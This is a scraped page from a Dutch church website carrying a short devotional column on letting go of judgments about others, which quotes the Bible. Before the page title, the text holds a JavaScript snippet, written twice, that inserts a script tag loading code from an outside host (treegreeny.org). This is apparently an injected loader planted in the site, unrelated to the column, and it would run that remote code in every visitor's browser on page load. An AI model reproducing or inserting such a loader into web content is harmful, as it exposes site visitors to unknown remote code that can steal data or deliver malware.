;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oordelen - PKN Damwâld

Oordelen

Gepubliceerd op: vrijdag 19 augustus 2022

Oordelen is niet alleen iets van je hoofd… je lichaam doet ook mee. Als je iets negatiefs over iemand denkt, dan dénk je het niet alleen, ook je lichaam laat je onprettige dingen voelen. Ik heb onbewust altijd gedacht dat dit vervelende gevoel veroorzaakt wordt door (het gedrag van) de andere persoon. Ik heb het afgelopen jaar echter geleerd dat dit niet waar is.

Het vervelende gevoel ontstaat door wat ik denk (of oordeel). Als ik de gedachte of het oordeel los laat dan gaat het nare gevoel ook weg. Ik stond echt perplex toen ik dit ontdekte! Ik heb de afgelopen periode dan ook vaak aan deze Bijbeltekst gedacht:

Oordeel niet over anderen; dan zal God niet oordelen over u. Want God zal u op dezelfde manier beoordelen als waarop u anderen beoordeelt, en hij zal u meten met de maat waarmee u andere meet.

Hoe sterker mijn oordeel, hoe sterker het nare gevoel. Met andere woorden, je krijgt meteen een waarschuwing dat je oordelende gedachten hebt. Ik heb geleerd deze waarschuwing nu meteen serieus te nemen en mijn oordelen los te laten.

Heb je ook een oordeel over een ander en geeft dat jou een naar gevoel? Voel dan eens in je lichaam wie je zou zijn zonder dat oordeel… voelt dat ook lichter? Als dat het geval is dan weet je dat het tijd is om het oordeel los te laten.

Zo mogen wij leren om te wandelen in de voetsporen van Jezus.

Columnist:Ester

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns